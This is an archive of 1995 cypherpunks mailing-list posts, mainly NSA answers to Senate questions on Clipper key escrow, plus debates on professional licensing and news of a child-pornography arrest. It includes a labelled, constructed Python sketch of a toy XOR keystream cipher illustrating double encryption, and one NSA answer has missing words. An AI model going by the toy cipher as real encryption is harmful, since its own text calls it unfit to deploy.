will criminal enterprises be able to operate more efficiently and
effectively if they no longer have to avoid using the
telecommunications system.

The United States is faced with a choice.  We can sit back and
watch as the emerging national information infrastructure becomes
a valuable tool for criminals and terrorists to use to plan and
carry out their activities with complete security, or we can take
steps to maintain the current ability of government to conduct
lawful wiretaps so that prudent criminals will have to find other
less efficient ways to operate and foolish ones may be caught.  Key
escrow encryption is the latter option.

Q:   Would widespread use of the Skipjack algorithm harm U.S.
exports?  Do you think it is unlikely foreign businesses will
purchase American encryption technology if the U.S. Government
holds a set of the decoding keys?

     Answer:  I do not believe that widespread use of key escrow
encryption in the United States will harm U.S. exports.  If it has
any effect at all, it could increase exports somewhat.  Key escrow
encryption products provide another option for foreign purchasers
that they have not had in the past; to the extent that foreigners
do purchase key escrow encryption products, it will mean an
increase in exports.  Meanwhile, U.S. exporters are free to
continue to sell the products they currently sell in foreign
markets and to seek license approvals for new products.

     It is difficult to predict the foreign market for U.S. key
escrow encryption technology.  Businesses that fear U.S. Government
interception of their communications presumably would avoid
products for which the U.S. Government holds keys.  However, there
are a number of reasons why foreign businesses might purchase them.
One major reason would be to communicate securely with U.S.
businesses that use them.  In addition, the superior level of
security provided by key escrow products (against all but lawful
U.S. Government access) may make them attractive to foreign
businesses that do not view U.S. Government access as a major concern.
While some prospective users abroad may steer clear of key escrow
products because the United States will retain access, there may be
many who believe they are unlikely to be targeted by U.S.
intelligence in any case or for whom the superior security offered
by key escrow encryption products against threats of greater
concern may make key escrow products an attractive option.  For
example, a distributor of pay-TV programming may depend on
encryption to ensure that only those viewers who pay for the
service can decrypt the TV signal.  Such a distributor probably
would not be concerned about the threat of access by the United
States Government, and might favor suitable key escrow encryption
products over competing products that use weaker encryption
algorithms.

Q:   You were present when the previous panelist, Stephen Walker,
described how present U.S. laws prohibit his company from exporting
encryption products.  As I understand it, Senator Murray's bill
S.1846, attempts to relax these export controls somewhat.

Please give us your views on this legislation.

     Answer:  I support the Administration's position, as announced
by the White House on February 4, that current export controls must
remain in place and that regulatory changes should be implemented
to speed exports and reduce the licensing burden on exporters.  The
bill you reference appears to be inconsistent with the
Administration position.  I would be happy to provide you further
information on the Administration's reasons for maintaining the
current export controls in an appropriate setting.

*Questions from Senator Murray:

Q:    In my office in the Hart building this February, I downloaded
from the Internet an Austrian program that uses DES encryption.
This was on a laptop computer, using a modem over a phone line.
The Software Publishers' Association says there are at least 120
DES or comparable programs world wide.  However, U.S. export
control laws prohibit American exporters from selling comparable
DES programs abroad.

With at least 20 million people hooked up to the
Internet, how do U.S. export controls actually prevent criminals,
terrorists, or whoever from obtaining DES encryption software?

     Answer:  Serious users of encryption do not entrust their
security to software distributed via networks or bulletin boards.
There is simply too much risk that viruses, Trojan Horses,
programming errors, and other security flaws may exist in such
software which could not be detected by the user.  Serious users of
encryption, those who depend on encryption to protect valuable data
and cannot afford to take such chances, instead turn to other
sources in which they can have greater confidence.  Such serious
users include not only entities which may threaten U.S. national
security interests, but also businesses and other major consumers
of encryption products.  Encryption software distribution via
Internet, bulletin board, or modem does not undermine the
effectiveness of encryption export controls.

[Primary written questions for Admiral McConnell]

1.   The Defense Authorization Bill for Fiscal Year 1994 has
authorized $800,000 to be spent by the National Research Council of
the National Academy of Sciences to conduct a study of federal
encryption policy.  Can we wait to implement the key escrow
encryption program until we have the benefit of the NRC's study?
Do you think this study is necessary?  Should this study be
expedited?

     Answer:  We do not believe that we can wait until after the
NRC study is completed in 1996 to begin implementation of the key
escrow initiative.  The information technology industry is dynamic
and fast-moving, and to wait another two years or more would, we
believe, jeopardize the success of the initiative.  Industry demand
for encryption products is growing, and the technology is available
now to meet that demand with encryption products that provide an
outstanding level of security to the user conduct lawful wiretaps.
To wait for the completion of the NRC study to other encryption
products which would defeat lawful wiretaps.  We believe that such
a delay would not be in the best interest of the American people.

Neither do we believe that the study should be expedited.  For
our part, we will carefully consider the conclusions of the NRC
study.  We expect that it will give very careful consideration to
the issues, and we would not want the pressure of an unnecessarily
short deadline to limit the study group's ability to produce the
best report possible.

2.   The Administration has said that it is continuing to restrict
export of the most sophisticated encryption devices, in part,
"because of the concerns of our allies who fear that strong
encryption technology would inhibit their law enforcement
capabilities."  Do we really need to help our allies by prohibiting
the export of strong American encryption products, since those same
countries can simply control the encryption bought within their
borders?

     Answer:  Exports of encryption products are subject to review
primarily to protect U.S. national interests, including national
security, law enforcement, foreign policy, and other important
interests.  The law enforcement concerns of our allies are a
consideration, especially as the ability of our allies to combat
terrorism, drug trafficking, and other international law
enforcement problems can have direct benefits to the United States.
However, foreign law enforcement concerns do not drive our export
control policy.  We would continue to review encryption exports to
protect U.S. national interests even if foreign law enforcement
concerns disappeared.

3.   Do you know whether foreign governments would be interested in
importing key escrow encryption products to which they hold the
decoding keys?

     Answer:  Several foreign governments have expressed interest
in key escrow encryption technology due to their own law
enforcement concerns.  There have been some preliminary
discussions, but issues such as who would hold the escrowed keys
and the circumstances of government access to escrowed keys must be
fully vetted.

4.   The Government wants the key escrow encryption standard to
become the de facto industry standard in the United States.  Would
the Government abandon the Clipper Chip program if it is shown to
be unsuccessful beyond government use?

     Answer:  We do not expect the program to be unsuccessful
beyond government.  We have developed a sound security product that
we expect will find many uses in government information systems and
further believe that government use will bring with it a commercial
market, particularly in the defense sector.  We have developed a
sound security product that we expect will find many uses in
government information systems regardless of its success in
commercial markets.

5.   Openly available devices, such as Intel-compatible
microprocessors, have seen dramatic gains, but only because
everyone was free to try to build a better version.  Given the
restrictions on who can build devices with the classified skipjack
algorithm, how will key escrow chips keep up with advances in
semiconductor speed, power, capacity and integration?

     Answer:  Despite the requirements that a firm must meet to
produce key escrow encryption chips, we expect that there will be
a number of manufacturers competing against each other to produce
the best product, and that such competition will drive them to keep
up with the latest technological advances.  It is worth noting that
only a few companies can produce the sophisticated microprocessors
you reference, yet the competition in that market has driven them
to achieve remarkable advances in that technology.  NSA's STU-III
secure telephone program provides an example of a cryptographic
product line that keeps pace with technology.

The presence of a classified algorithm does not preclude
keeping pace with technology.  Through NSA's use of a competitive,
multi-vendor approach, STU-III secure telephone products have
continued to evolve in response to user requirements and
technological advances despite their use of a classified encryption
algorithm and the consequent need for security restrictions on the
manufacturers.

6.   How well does the Skipjack algorithm work on
telecommunications operating at very high speeds?  Is NSA working
on another algorithm, called BATON, that could be used in high
speeds with a key escrow system?  Will Capstone be compatible with
BATON?

     Answer:  Using currently available microelectronics technology
the SKIPJACK algorithm could not be used for encryption at very
high speeds.  BATON is the name of an algorithm developed by NSA
that could be used at higher rates of speed.  We have no plans to
develop key escrow encryption devices using BATON, however.
Instead, we are considering another algorithm for use at high
speeds with a key escrow system.

A high-speed key escrow device based on an algorithm other
than SKIPJACK would not be "compatible with Capstone" in the sense
that traffic encrypted by such a device could not be decrypted by
Capstone, and vice versa.  However, since such a device would be
used for much higher-speed applications than those for which
Capstone was designed, there would be no need for it to be
compatible with Capstone in that sense.

7.   Can Capstone be used to encrypt video programming?  If so,
have cable companies been approached by any government agency to
use Capstone to scramble or encrypt cable program?

     Answer:  Capstone could be used to encrypt any digital signal,
including video programming, operating at up to about 10 million
bits per second.  It could be used for encrypting individual video
channels but not for bulk encryption of many channels multiplexed
together in a single link.  NSA is not aware of any government
agency approaching cable companies to urge the use of Capstone.
Two manufacturers have asked us about the suitability of key escrow
devices for this purpose, however.

8.   Encryption software is available that can be used with Clipper
to encrypt a message before after it has been encrypted with
Clipper.  This "double encrypting" risks bypassing the key escrow
feature.  If a sender first encrypts the message with software
using DES, and then transmits the message "double encrypted" with
Clipper, can you tell from looking at the cipher, or encrypted
text, that the underlying message was encrypted?

     Answer:  The only way to tell that a message has been "double
encrypted" in this way would be to decrypt the "outer layer" of
encryption, i.e. that done with Clipper.  Only then would one be
able to tell that the message had first been encrypted with
something else.
 
----------
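
Added example, not part of the NSA answers or of the original post: a
small Python sketch of the point in answer 8, that single- and
double-encrypted traffic look the same until the outer layer is removed.
The SHA-256 keystream cipher is a stand-in for Skipjack and DES, and the
keys, message text and thresholds are constructed assumptions.

```python
import hashlib
import math
from collections import Counter


def toy_stream_cipher(key: bytes, data: bytes) -> bytes:
    """XOR data with a SHA-256 counter keystream.

    Stand-in for Skipjack and DES (assumption: neither is in the Python
    standard library). Applying it twice with the same key decrypts.
    Illustration only, not a cipher to deploy.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        counter = (offset // 32).to_bytes(8, "big")
        pad = hashlib.sha256(key + counter).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def entropy_bits_per_byte(data: bytes) -> float:
    """Shannon entropy of the byte histogram (8.0 is the maximum)."""
    total = len(data)
    return -sum(c / total * math.log2(c / total)
                for c in Counter(data).values())


def printable_fraction(data: bytes) -> float:
    """Share of bytes that are printable ASCII or common whitespace."""
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def looks_like_ciphertext(data: bytes) -> bool:
    """Heuristic: near-uniform bytes and mostly non-printable content.

    Thresholds are assumptions tuned for samples of a few kilobytes.
    Compressed data would also trip this check.
    """
    return entropy_bits_per_byte(data) >= 7.5 and printable_fraction(data) <= 0.6


def examine_intercept(wire: bytes, outer_key: bytes) -> dict:
    """What an examiner learns before and after removing the outer layer."""
    inner = toy_stream_cipher(outer_key, wire)
    return {
        "outer_looks_encrypted": looks_like_ciphertext(wire),
        "inner_looks_encrypted": looks_like_ciphertext(inner),
    }


# Constructed sample data: keys and message are invented for this example.
OUTER_KEY = b"constructed-outer-session-key"
INNER_KEY = b"constructed-inner-private-key"
PLAINTEXT = b"Meet at the usual place at noon. Bring the quarterly figures.\n" * 70


def build_samples():
    """Return (single, double): outer-only and inner-then-outer encryptions."""
    single = toy_stream_cipher(OUTER_KEY, PLAINTEXT)
    double = toy_stream_cipher(OUTER_KEY, toy_stream_cipher(INNER_KEY, PLAINTEXT))
    return single, double


if __name__ == "__main__":
    for name, wire in zip(("single", "double"), build_samples()):
        print(name,
              "entropy=%.2f" % entropy_bits_per_byte(wire),
              examine_intercept(wire, OUTER_KEY))
```

On the wire both samples score as ciphertext; only the decrypted inner
layer of the double-encrypted one still does.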













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 14 Sep 95 03:21:13 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <v01510104ac7d40ec670b@[198.59.115.127]>
Message-ID: <Pine.SUN.3.91.950914053029.16104A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,
> >On Wed, 13 Sep 1995, Dar Scott wrote:
> >
> >> Black Unicorn wrote,
> [snip]
> 
> We seem to be having problems with the meanings of words.  For example, I
> make a distinction between certification and licensing.

Which, as I have indicated, I see as a "distinction without a difference."

> Also, I see
> violence and coercion as being ultimately related to something physical.
>

So you wouldn't consider the Hollywood blacklist coercive?

What about revocation of tax free status?

I could go on for hours of examples how one can be hurt without a 
physical element.

> I'm not sure what "proper", "competent to practice"... mean.

In the context I was using them, they mean whatever the licenser 
(certifying authority if you prefer) says they mean- this is part of the 
point.

> And I see a
> big difference in a market based monopoly and a government based monopoly.
> 

Which, I think, is your key error- particularly in the context of this 
licensing issue, where the difference is nearly invisible.

> [snip]
> >Didn't I just say this above?
> >
> >A centralized, or several centralized authorities.
> 
> I had assumed you meant by authority an agent of the state that is able to
> invoke or otherwise wield the physical force of the state.

I think your hangup is one of overdemonizing the state to the point where 
no other evils seem to exist.

  By a certifying
> entities I was referring to private organizations that had no similar power
> or to government organizations that had only the power to provide
> information.

Like TRW.  Would you argue there is no coercive power in this entity?  
Yet they are not affiliated with government.

> By a licensing entity I was referring to an organization that can coerce to
> prevent the unlicensed from doing the licensed behavior.  By coercion I
> meant the threat of physical force or the force itself.

And as I indicated before, one need not threaten violence to coerce.

I will point to the TRW example again.

  Though one might
> think of physical force as applying to murder, kidnapping, slavery,
> assault, robbery, physical theft, I would also apply it to theft or damage
> of abstract property that has properties like physical property.  I intend
> for these to apply to many actions of the state.

I think you have failed to apply them to other organizations.  Again, I 
think you are over-enamoured with hating "the state."  Many organizations 
not affiliated with government do violence to abstract properties.

> Perhaps I erred in applying "certification" and "license" to these
> contrasting concepts, but I do think the distinction is important and the
> observation that there are fuzzy areas in between does not remove that.
>
> If I have a license from the local gang to sell drugs and the guy across
> the street does not, I could encourage the gang to do something and the guy
> might get shot.  Similarly, if I was a PE and my competitor across the
> street was not, I could encourage the state to do something that--with
> several stages of his lack of cooperation--results in his finding a gun in
> his face or worse.

If I am a producer in a horizontal territory limitation agreement for 
sales of widgets, and bob is not, bob's attempt to move into my area and 
sell widgets will be met with a boycott by all the members of my 
agreement.  Is this any less coercion?  I understand the violence is 
fairly dramatic coercion, but it is hardly the only coercion.  Do you not 
consider the Clipper program coercion?

I suggest you take a look at Nozick, Coercion, in Philosophy, Science and 
Method  (S. Morgenbesser ed. 1969) or Zimmerman, Coercive Wage Offers, 10 
Phil & Pub. Aff. 121 (1981)  Also, see Kreimer, Allocational Sanctions: 
The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev. 
1293 (1984).

Personally I think Justice Stone had it correct with "Threat of loss, not 
hope of gain, is the essence of economic coercion."

You might also take a look at the Yale Law Review article by Reich:
(73 Yale 7 I think)
 

> >I guess the center of my question is, how can you apply Web of Trust to
> >e.g. a university degree.  Who cares what Bob and Alice think my degree
> >is in, the client only wants to know from the institution.
> 
> It does not matter why people would trust a certifying entity.  It might
> have a great earned reputation, it might "borrow" some reputation from
> bonding or audits, or it might have ties to the Real World.

Exactly, it must be tied to some kind of authority.  In this case, the 
issuing institution is about the only acceptable one.

I stand by the contention that a University degree cannot be certified 
acceptably by an authority not in some way connected to the University.
 
> >  Licensing can only be done by an
> >>      entity that can use physical force to prevent
> >>      buying and selling legal services.
> >
> >I believe you are incorrect, but I guess my main concern is your
> >characterization of "Physical force."  I am assuming you mean coercion,
> >and not that you will be jailed or such (though this may be the case).
> >
> >I would argue that as long as coercion exists (violence of any type,
> >physical or not) you have a licensing authority.  Take the hollywood
> >blacklist.  No one actually pushed around suspected pinko screenwriters
> >(well, at least, if anyone did, it was incidental) but they certainly
> >faced a great deal of persuasive motivation.  Look at the committee as
> >the licensing authority here.  (Licensing you as a non-communist as it were).
> 
> It seems I am using coercion in a different sense.  Unless blacklisting has
> physical force at its root enforcement mechanism it is not coercion and is
> very fragile.

You are using coercion in a different sense.  One of the definitions I 
get in Webster's (while force is incorporated in some others) is "to 
compel to do something by the use of power, intimidation or threats."

If you prefer that I use "serious persuasion" instead, fine, but I think 
you are just splitting hairs.

> >If several governmental and private authorities were in the practice of
> >certifying that Bob has a law degree from Tremont University, and that he
> >is competent to practice in D.C., and given that the citizens of D.C.
> >will look for these credentials, isn't this a license?  After all, Bob has
> >to pass some test or requirement to get the signatures.  Isn't this
> >coercion in your definition?
> 
> No.  I apologize for any confusion.

You needn't apologize, but I must admit, this looks a lot like coercion 
to me, as well as to Reich, and several justices of the Supreme Court.  

Do you believe it impossible/insignificant to manipulate behavior by 
persuasive means other than violence or the threat of actual physical 
violence?

> >Can't the multiple authorities set common
> >or near common guidelines?  Rather, don't they HAVE to in order to have
> >their signatures worth the electrons they are transmitted with?
> 
> In general, No.  Under many conditions market forces make services alike,
> but more often competing businesses find particular market niches.

An example please?  With specific regard to certifying authorities and 
university degrees?

  I would
> expect that different certs would cover different levels of expertise,
> different specializations and different breadths of specializations.  Any
> lawyer might have a dozen certs.  I would not expect there to be a single
> level of certification for all applications.  I know of several companies
> in which the primary product designer has no engineering degree.

But certainly all lawyers must have some base level of certification, 
even if this is only market enforced?  i.e. no one would accept a lawyer 
with NO certification (or few enough people to make it impossible to be 
one with some certification) this being so, the withholding of the 
required certification is still co- er... persuasion, no?

> >If you take the extreme position you seem to, there's an antitrust case here.
> I don't insist there has to be a variety.  I only desire that coercion does
> not come into play in preventing it.  As I said, if a natural monopoly
> forms at times, I am not worried.

I still am having trouble understanding your definition of coercion.

> 
> >Am I not "licensing" my key signature to people provided they pass my key
> >signature criteria?  Am I not doing violence by withholding my signature
> >and the benefits it might convey for certain "terms?"
> [snip]
> >This is the trap of the licensing argument.
> 
> I see a big difference in withholding a signature and sending gunmen.
> There is no violence in withholding a signature.

There is no PHYSICAL violence, this I have admitted, but the economic 
violence of such an act can be significant.  It seems that for you the 
distinction is in the emotional effect of the application of persuasive 
force, rather than the effect.

I've given this example before.

We take two convicted carjackers.

The first we sentence to 5 years, but after 4 years and 50 weeks, tell 
him that we are going to extend the sentence another 10 years unless he 
takes an experimental vaccine.

The second we sentence to 15 years, and after 4 years and 50 weeks, we 
tell this one that we will cut off 10 years from the sentence if he takes 
the experimental vaccine.

What's the difference?  Both have been given two choices

1>  Spend 15 years, no vaccine.
2>  Spend 5 years, take vaccine.

The point is that the first is emotionally more stacked, you feel sorry 
for the carjacker (well, maybe I should have picked crypto exporter) 
because he has been tricked.  When asked, 90% respond that the first is 
more "unfair."

Allowing emotion to cloud one's judgement of what is and is not coercive 
is a mistake.

> >The evil is not licensing, which I think serves a real purpose, but
> >created convenience fees, taxation through the withholding of licensing
> >and the use of other government largess.   I wrote a massive piece on this
> >and sent it to the list about a year and a half ago.  With interest I will
> >repost it.
> 
> Even if no one else is interested, I'd like to see it.

Let me dig it up.

Absent another public request I will send it in E-Mail only.

> >The real question is how you decide what an authority to license is.  Is
> >it to be dictated by government?  Or by market forces (i.e. the
> >reputation of the licenser).
> 
> Yes, the government vs. market question is key, but I believe the answer is
> in that distinction I used in contrasting terms "certification" and
> "license".  The "who" is tied up in what the instrument is.

I believe that your defining the words merely to distinguish who the 
certifying authority is confusing- and deceptive.

> >> >I don't see how the net will eliminate the basic need for highly
> >> >qualified professionals and the proof that they have credentials.
> >>
> >>      It won't.  The needs might shift a little but they
> >>      will be there.
> >
> >Then why will lawyers, or a 'professional monopoly' be broken?
> The meaning of "qualified professional" and "credentials" will be
> market-based and multidimensional, not defined by the state or a group
> already "qualified" using the state for enforcement.

I still think you are mistaken in that I feel you are ignoring the fact 
that no market exists below a certain certification level, regardless of 
how diverse the certifiers are.  You also still miss that credentials for 
attorneys are already multidimensional.

[market monopolies are "softer" than government ones.]

> >these authorities, and if (as you seem to be saying a few paragraphs up) it
> >is hard to break into the trusted certification business, there is a
> >monopoly again.
> I don't really think this is a problem.  It is the force-based monopoly and
> specifically the government-based monopoly I have a problem with.

I will point to the oil companies in the industrial age, as well as the 
railroads.  Certainly the potential for violence is not limited to 
government.  I hate this example, but in this particular case I think you 
are missing its context.

> [snip]
> >Like the several state Bars?
> The market advantage is slight.

I'm not sure I follow you here.

> [snip]
> >So you have essentially admitted that a central authority is required?
> >Or will be more often used?
> Not required.

Then how do you explain the points I have brought up.

The base requirement of a certification from an education institution 
(for which you have provided no substitute).

The existence of a floor, below which it is impractical to practice a 
profession and the existence of a set of entities (of whatever number) 
whose signatures are required to transcend this floor.

> [snip]
> >If your definition of license is simply who does the coercing, I think you
> >should reconsider.
> 
> Whatever the word used, I see the distinction between 1) the assertion of
> certain information and 2) the threat of force as being key.
> 
> Perhaps, I could have used the phrases "non-coercion-based" licensing and
> "coercion-based" licensing, but I am not comfortable with these--trade
> licensing invokes too violent of an image.

I think this construction is still flawed.  I will remain by my position 
that licensing is useful when not used to collect taxes or 
otherwise overregulate.  I also hold that the distinctions you make 
between licensing and certification are without functional difference in 
effect and are deceptive in that they suggest a significant difference in 
effect or purpose where there is none.

> A note to all in government licensed trades:  I recognize that licensing is
> part of the real world we live in.  Often one has to be licensed to
> practice a favorite trade.  I do not mean to describe the licensed
> themselves as violent.

Thanks.

> Dar
> 
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 14 Sep 95 03:33:03 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950914054153.8806C-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950914062316.16104B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Sep 1995, Duncan Frissell wrote:

> 
> 
> On Wed, 13 Sep 1995, Black Unicorn wrote:
> 
> > But won't clients insist on proper credentials in one form or another?  
> > Doesn't the practicality and accountability of a centralized authority 
> > (or several authorities) provide the best answer to this?  Who is going 
> > to accept my signature promising that I did indeed get a law degree and 
> > pass the bar?
> 
> An educational institution can certify its own graduates --- it does 
> now.  Competing credentialing institutions is exactly what I would be 
> looking for as opposed to today's coercive monopoly.  

Yes, in the context of competing credentialing institutions I agree, but 
even now there is a base certification for such institutions 
(accreditation) which is delved out by a central authority, or common 
standards.  What the other writer's approach missed was that one could 
not, in the end, do away with the basic requirement for some kind of 
standardization, even if it was market driven.

While I too prefer the market approach, I still contend that a floor of 
credentials will exist, and indeed, should exist.

> 
> No matter how skilled, it is illegal for an unlicensed person to practice 
> law, medicine, or many other professions in any state.  The nets weaken 
> these restrictions because they allow action at a distance.

But I believe there will still be a demand for an objective, or trusted 
authority in the market.  This was my point when I asserted that 
certificates from Bob and Alice that I was a decent attorney would not be 
sufficient for most unless Bob and Alice were trusted in the "attorney 
credential" area.  So in the end, isn't a trusted authority required to 
some degree?

I think the difference here, as opposed to the Web of Trust in e.g., PGP, 
is that you are talking about legal talent, or any professional talent, 
for which payment is being made.  It's easy to accept a signature from 
Mr. Mar indicating that Bob has (in Mr. Mar's opinion) decent key 
management habits, but it's asking a great deal to extend that trust in 
Mr. Mar to his opinion of Bob's legal skills.  For that there will be a 
demand of more detailed and certain expertise in Mr. Mar, and also a 
trust that Mr. Mar is not just helping an upstart friend of his make some 
money in consulting for nuclear physics projects.

i.e. it is very difficult to establish the objectivity of a certifier 
without some kind of public and significant risk on the part of the 
certifier coupled with some verifiable skill in appraising nuclear 
physics skill- a situation I would argue is almost impossible without a 
certificate from an institution which meets some base credentials, which 
are set up publicly by an objective process, or nearly so.

> Note the other effects of the nets.  They make it hard to tell that you 
> *are* working which reduces the impact of regulations of work by 
> "illegal aliens."  Thus if I am wandering through the South of France 
> while writing the 'Great American Novel' I am unlikely to get busted for 
> violation of work restrictions.  The nets expand the number of jobs I 
> can do while innocently wandering the South of France.  I can or will 
> soon be able, for example, to manage a large international corporation 
> from anywhere.

This I understand and applaud.

> DCF
> 
> "Who actually prefers Le Massif Central to those hot and crowded southern 
> climes." 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 14 Sep 95 04:39:39 PDT
To: cypherpunks@toad.com
Subject: DD, pedaphiles, and Terrorists, oh my
Message-ID: <27512.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's Washington Post (9/14) has a front page article on a bust of
12 computer using pedophiles.

NBC news is saying that Janet Reno will have a news conference
later this morning.

Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
will be held.

Coincidence?

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Thu, 14 Sep 95 07:56:40 PDT
To: Pat Farrell <pfarrell@netcom.com>
Subject: Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <27512.pfarrell@netcom.com>
Message-ID: <Pine.LNX.3.91.950914075351.4971A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Pat Farrell wrote:
> Today's Washington Post (9/14) has a front page article on a bust of
> 12 computer using pedophiles.
> NBC news is saying that Janet Reno will have a news conference
> later this morning.
> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
> will be held.
> Coincidence?

<g> I think not.. Kind of like the coincidence that just before any gun 
law votes, some maniac goes on a shooting spree.. ;)

I would be interested to hear what Reno has to say.. if someone is in a 
position to hear/see it, and can drop the key parts here, I would 
appreciate it.

'Course, I would rather have pedophiles using computers than stalking parks..


Thanks-
RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 08:11:08 PDT
To: mnorton@cavern.uark.edu
Subject: Re: Digital Fingerprinting
Message-ID: <9509141507.AA21086@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Mac Norton <mnorton@cavern.uark.edu>
> To: Patrick Horgan <patrick@Verity.COM>
> 
> On Wed, 13 Sep 1995, Patrick Horgan wrote:
> 
> > > 
> > > > Then, in W.Ky., as in Stockbridge, "You can get
> > > > anything you want..."? :)
> > > 
> > > I'd stick with:
> > > ***********************************************
> > > You can't always get what you want            1
> > > but if you try
> > > sometimes, sometimes you get what you need.   2
> > > ***********************************************
> > > 
> > > 1 ability to dump garbage where you want
> > > 2 a better appreciation for the environment
> > > :-)
> > 
> > 
> > Why do I feel like I'm sitting on the group W bench?
> 
> I don't know, kid, what you in for?
> 

Encryption.  And they all moved away from me on the group W bench there,
talking mean hairy eyeballs and all sorts of things until I said, and
annoying the NSA, and they all moved back, talking about crime, PEM, PGP,
and liberty and justice for all;)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 14 Sep 95 08:25:06 PDT
To: "Rev. Ben" <cypherpunks@toad.com>
Subject: Re: WAS_tem
Message-ID: <199509141524.IAA00532@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>> The bill would expand the definition of child pornography 
>> to include any [...] 
>> image produced by any means, including electronically by 
>> computer, if it depicts or appears to depict a minor 
>> engaging in sexually explicit conduct. 

At 10:40 AM 9/14/95 -0400, Rev. Ben wrote:
>If I'm reading this correctly, if I Photoshop a kids face onto the body 
>of the latest Playboy centerfold, I'm in violation of this proposed law?

If you draw a picture using paintbrush of an underage person engaging
in sexual conduct, you are in violation of this proposed legislation.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 Sep 95 05:23:52 PDT
To: cypherpunks@toad.com
Subject: WAS_tem
Message-ID: <199509141223.IAA08242@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-14-95. NYPaper.


   "Use of Computer Network For Child Sex Sets Off Raids."

      The Justice Department today announced a dozen arrests
      in a two year investigation into the use of America
      Online, the country's largest computer network, to
      distribute child pornography and to lure minors into
      sex. The culmination of the inquiry by the Federal
      Bureau of Investigation comes at a time when the agency
      has needed some favorable attention to offset a string
      of incidents that have cast it in a negative light.


   "Scientologists Lose a Battle on the Internet."

      Upholding free speech on the Internet, a Federal judge
      has ordered the Church of Scientology to return
      computers and files seized here last month from two men
      who used a computer bulletin board to disseminate
      information critical of the church. The equipment
      belongs to Factnet, an anti-Scientology bulletin board
      run by two Boulder men, Lawrence Wollersheim and Robert
      Penny.


   2x: WAS_tem  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 08:28:51 PDT
To: nobody@REPLAY.COM
Subject: Re: NSA on GAK
Message-ID: <9509141525.AA21098@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


I've reformatted this to make it easier to read...If you've already read it,
then just delete it:)

~~~~~~~ Included reformatted stuff starts here --\/ ~~~~~~~~~~~~~~~~~~~~~~

URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt

----------

Note:  The following answers were provided by NSA to the Senate
Subcommittee on Technology and the Law in response to their follow-
up questions to the May 3, 1994 hearings.

                   ---------------------------

          Senate Subcommittee on Technology and the Law
 Hearing on the Administration's Key Escrow Encryption Standard

        Written Questions for Vice Admiral McConnell, NSA

*Questions for Senator Pressler:

Q:   Admiral, as you are aware, critics of the Administration's
proposal argue that as a practical matter, no criminal, foreign
spy, or terrorist of any sophisticated would be foolish enough to
use an encryption device designed by the NSA and approved by the
FBI.

How do you respond? Why do[n't you] think the people whose
telecommunications the NSA and the FBI want most to decode will be
the very people most unlikely to use this technology?

Answer:   From what we know today, the overriding requirement that
spies, terrorists, and criminals have is for readily available and
easy to use equipment that interoperates.  Key escrow encryption is
not meant to be a tool to catch criminals.  It will make excellent
encryption available to legitimate businesses and private citizens
without allowing criminals to use the telecommunications system to
plan and commit crimes with impunity.  We believe it would be
irresponsible for government to make excellent encryption broadly
available knowing that its use by criminals would make it
impossible for law enforcement agencies to conduct lawful wiretaps
against them.

